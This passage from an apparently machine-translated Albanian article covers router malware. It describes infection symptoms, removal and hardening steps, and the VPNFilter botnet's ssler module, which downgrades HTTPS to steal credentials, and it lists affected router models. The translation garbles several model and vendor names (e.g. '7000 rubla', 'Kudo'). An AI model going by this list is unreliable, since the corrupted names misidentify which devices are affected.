2. Disa faqe nuk hapen. Në vend të kësaj, shfaqen faqet e internetit me përmbajtje të çuditshme ose një gabim 404.
3. Nuk ka akses në internet edhe pse WAN/Internet LED është ndezur.
4. Kompjuteri merr një adresë IP nga diapazoni 169.254.*.*
Si të hiqni një virus nga një ruter
Si të mbroni ruterin tuaj nga viruset
1. Përditësoni firmuerin me më të fundit
Shkoni në faqen e internetit të prodhuesit, futni modelin tuaj dhe shkarkoni firmware-in më të fundit. Lexoni shembullin e pajisjeve TP-Link.
2. Vendosni një fjalëkalim të personalizuar për ndërfaqen e internetit
Jo të gjithë ruterat ju lejojnë të ndryshoni hyrjen tuaj. Por nëse instaloni fjalëkalim kompleks, kjo do të mjaftojë.
3. Ndaloni hyrjen në ndërfaqen e ruterit nga Interneti
4. Ndryshoni adresën IP të ruterit në rrjetin lokal
As mos dyshoni se gjëja e parë që një virus ruteri do të bëjë është të hyjë në adresat më të njohura: 192.168.0.1 dhe 192.168.1.1. Prandaj, ju këshillojmë të ndryshoni oktetin e tretë dhe të katërt adresa IP lokale në Cilësimet e LAN-it. Vendosni për shembull:
192.168.83.254
Pas kësaj, të gjitha pajisjet në rrjet do të marrin një IP nga diapazoni 192.168.83.*
Pas ndryshimit të IP-së lokale të ruterit, do t'ju duhet të futni http://[adresa e re] për të hyrë në ndërfaqen e internetit
5. Instaloni një antivirus të besueshëm në kompjuterin tuaj
Edhe nëse malware depërton në kompjuter, ai do të neutralizohet dhe nuk do të ketë kohë të infektojë ruterin.
6. Mos ruani fjalëkalimet në shfletues
Unë mendoj se ju jeni në gjendje të mbani mend fjalëkalimin nga ndërfaqja e internetit e ruterit. Ose të paktën shkruajeni në letër.
Në dritën e rasteve në rritje të zëvendësimit DNS me qëllim të keq programet në pajisjet e përdoruesve të internetit, lind pyetja siguria wifi ruterat. Si të kontrolloni ruterin për viruse? Si të hiqni një virus në një ruter? Pyetja është komplekse dhe e thjeshtë në të njëjtën kohë. Ka zgjidhje!
Vetë virusi nuk mund të shkruajë vetveten në shumicën e ruterëve modernë për shkak të hapësirës së vogël në kujtesën e vetë ruterit, por ai mund të zombizojë ruterin për të marrë pjesë në një botnet. Si rregull, ky është një botnet për të sulmuar serverë të ndryshëm, ose për të ridrejtuar dhe analizuar rrjedhën e informacionit që ju lë në internet.
Fjalëkalimet dhe korrespondenca juaj personale mund të bien në duart e ndërhyrësve!
Kjo duhet të korrigjohet sa më shpejt të jetë e mundur.
- Rivendosni cilësimet e ruterit
- Firmware i ruterit
- Rikonfigurimi
Rivendos cilësimet e ruterit
Mund të rivendosni cilësimet e ruterit duke shtypur butonin e rivendosjes. Zakonisht ky buton ndodhet në anën e pasme të ruterit, ku Portet LAN. Zakonisht butoni futet në një vrimë për të shmangur shtypjen aksidentale, kështu që duhet të përdorni një kruese dhëmbësh. Kjo është do të fshijë cilësimet e ruterit të ndryshuar nga virusi dhe do të instalojë ato të fabrikës në vendin e tyre. Unë duhet t'ju paralajmëroj se nëse nuk dini si të konfiguroni një ruter, atëherë grumbull mbeturinash cilësimet e saj për ju nuk ia vlen!
Firmware i ruterit
Ndonjëherë virusi "përmbytet" firmware i modifikuar te ruteri. Mund të hiqni firmware-in e virusit nga ruteri duke ndezur përsëri ruterin.
Lidheni kompjuterin me ruterin me një kabllo LAN. kabllo LAN vjen me çdo ruter. Ose nëpërmjet Wi-Fi, nëse nuk ka mundësi lidhjeje me kabllo. Është më mirë të lidheni me një kabllo! Lidhje me valë konsiderohet e paqëndrueshme dhe jo e përshtatshme për firmware-in e ruterit.
Pasi të jemi lidhur me ruterin, hapni shfletuesin (Chrome, Opera, Mozilla, IE) dhe futni shiriti i adresave adresën Ruteri ASUS, për Asus është 192.168.1.1, në faqen që hapet, duhet të futni hyrjen dhe fjalëkalimin për të hyrë në cilësimet e ruterit. Hyr: admin, Fjalëkalimi: admin. Nëse emri i përdoruesit dhe fjalëkalimi nuk përshtaten, atëherë pyesni personin që konfiguroi ruterin tuaj, ndoshta ai i ka ndryshuar ato.
Shkarkoni firmuerin nga faqja e internetit e prodhuesit dhe zgjidhni firmuerin në disk duke përdorur faqen e cilësimeve të routerit. Për shumicën dërrmuese të ruterave, hapat e firmuerit janë të njëjta.
Disa javë më parë, ekspertët siguria e informacionit, i quajtur VPNFilter. Siç doli, qëllimi kryesor të këtij malware janë ruterët më të shumtë prodhues të ndryshëm. Një nga të parët që i kushtoi vëmendje VPNFilter ishte një ekip specialistësh infobez nga Cisco Talos.
Malware po përmirësohet vazhdimisht nga zhvilluesit e tij. Është zbuluar së fundmi modul i ri, i cili përdor një lloj sulmi njeriu në mes trafiku në hyrje. Sulmuesit mund të modifikojnë trafikun që kalon përmes ruterit. Gjithashtu, ata lehtë mund të ridrejtojnë çdo të dhënë në serverët e tyre. Moduli i virusit u emërua ssler.
Përveç modifikimit të trafikut në hyrje, ssler gjithashtu mund të transferojë të dhënat personale të viktimës te krijuesit e tij. Këto mund të jenë fjalëkalime lloj te ndryshme burimet që kriminelët kibernetikë i përdorin më pas për qëllime të ndryshme.
Për të parandaluar vjedhjen informata personale zakonisht përdoret kriptimi TLS, të cilin malware mund ta anashkalojë. Kjo bëhet duke "zvogëluar" lidhjet HTTPS në trafikun HTTP, i cili nuk mbrohet nga asgjë. Titujt e kërkesës zëvendësohen më pas, gjë që shërben si një sinjal se pika e hyrjes është e cenueshme. Ssler në mënyrë të veçantë modifikon trafikun e burimeve të ndryshme, duke përfshirë Google, Facebook, Twitter dhe Youtube. Fakti është se këto shërbime ofrojnë mbrojtje shtesë. për të Shembulli i Google ridrejton trafikun HTTP te serverët HTTPS. Por moduli ju lejon të anashkaloni këtë mbrojtje, në mënyrë që sulmuesit të marrin trafik të pakriptuar.
Që nga zbulimi i një virusi, specialistët e sigurisë së informacionit kanë studiuar aftësitë e tij. Tani rezulton se është më e rrezikshme nga sa mendohej. Më parë, për shembull, ekspertët e Cisco-s argumentuan këtë detyra kryesore ndërhyrës - infeksion pajisjet e rrjetit në zyrat e kompanive dhe në shtëpitë e viktimave. Ndoshta për të formuar një botnet. Por tani doli se janë përdoruesit, ose më saktë, të dhënat e tyre, ai që është qëllimi kryesor.
“Fillimisht, kur zbuluam virusin, ne besuam se ai ishte krijuar për të zbatuar lloje të ndryshme sulmet në rrjet. Por doli që kjo nuk është aspak detyra kryesore dhe mundësia e malware. Ai u krijua kryesisht për të vjedhur të dhënat e përdoruesit dhe për të modifikuar trafikun. Për shembull, një virus mund të ndryshojë trafikun në atë mënyrë që një përdorues klient-bankë të shohë të njëjtën shumë në llogarinë e tij. Por në fakt, paratë nuk janë aty për një kohë të gjatë”, thuhet në raportin e specialistëve të sigurisë kibernetike.
Është interesante se shumica e pajisjeve të infektuara ndodhen në/në Ukrainë. Masat mbrojtëse si Siguria e rreptë e transportit HTTP nuk janë shumë të zakonshme këtu, kështu që të dhënat e përdoruesit janë në rrezik. Por ka probleme edhe në vende të tjera - për shembull, në SHBA dhe Evropën Perëndimore, shumë pajisje të vjetëruara nuk mbështesin HTTPS, duke vazhduar të përdorin HTTP.
Më herët u raportua se modelet më të cenueshme të ruterit për këtë virus janë pajisjet e prodhuara nga ASUS, D-Link, Huawei, Ubiquiti, UPVEL dhe ZTE. Në fakt, gama e pajisjeve të cenueshme ndaj virusit është shumë më e gjerë. Kjo, duke përfshirë modelet nga Linksys, MikroTik, Netgear dhe TP-Link.
Lista e plotë pajisje të cenueshme
Asus:
RT-AC66U (i ri)
RT-N10 (i ri)
RT-N10E (i ri)
RT-N10U (i ri)
RT-N56U (i ri)
RT-N66U (i ri)
D Link:
DES-1210-08P (i ri)
DIR-300 (i ri)
DIR-300A (i ri)
DSR-250N (i ri)
DSR-500N (i ri)
DSR-1000 (i ri)
DSR-1000N (i ri)
Huawei:
HG8245 (i ri)
linksys:
E1200
E2500
E3000 (i ri)
E3200 (i ri)
E4200 (i ri)
RV082 (i ri)
WRVS4400N
Mikrotik:
CCR1009 (i ri)
CCR1016
CCR1036
CCR1072
CRS109 (i ri)
CRS112 (i ri)
CRS125 (i ri)
RB411 (i ri)
RB450 (i ri)
RB750 (i ri)
RB911 (i ri)
RB921 (i ri)
RB941 (i ri)
RB951 (i ri)
RB952 (i ri)
RB960 (i ri)
RB962 (i ri)
RB1100 (i ri)
RB1200 (i ri)
RB2011 (i ri)
RB3011 (i ri)
RB Groove (i ri)
R.B. Omnitik (i ri)
STX5 (i ri)
Netgear:
DG834 (i ri)
DGN1000 (i ri)
DGN2200
DGN3500 (i ri)
FVS318N (i ri)
MBRN3000 (i ri)
R6400
7000 rubla
R8000
1000 WNR
WNR2000
WNR2200 (i ri)
WNR4000 (i ri)
WNDR3700 (i ri)
WNDR4000 (i ri)
WNDR4300 (i ri)
WNDR4300-TN (i ri)
UTM50 (i ri)
QNAP:
TS251
TS439Pro
QNAP NAS të tjera me QTS
Lidhja TP:
R600VPN
TL-WR741ND (i ri)
TL-WR841N (i ri)
Kudo:
NSM2 (i ri)
PBE M5 (i ri)
lart:
Modele të panjohura* (të reja)
ZTE:
ZXHN H108N (i ri)
Dhe kjo nuk është e gjitha
Përveç gjithçkaje që u njoftua më lart, Talos raportoi zbulimin e një moduli snifer. Ai analizon trafikun në kërkim të të dhënave lloj i caktuar lidhur me sistemet industriale. Ky trafik kalon përmes TP-Link R600, i cili përcaktohet nga moduli. Përveç kësaj, moduli kërkon goditje IP nga një gamë e caktuar, si dhe paketa të dhënash me madhësi 150 bajt ose më shumë.
“Krijuesit e virusit po kërkojnë gjëra shumë specifike. Ata nuk përpiqen të mbledhin sa më shumë informacion në dispozicion, aspak. Ata kanë nevojë për fjalëkalime, hyrje, qasje në një gamë specifike IP dhe të ngjashme. Ne po përpiqemi të kuptojmë se kujt mund t'i duhet gjithë kjo, "thanë studiuesit.
Por kjo nuk është e gjitha, sepse tani virusi po përditësohet, në funksionalitetin e tij është shfaqur një modul vetë-shkatërrues. Kur moduli aktivizohet, virusi hiqet nga pajisja pa asnjë gjurmë.
Pavarësisht se rreth një javë më parë FBI zbuloi dhe sekuestroi serveri kryesor, botneti është ende aktiv, masat e marra qartë se nuk mjafton.
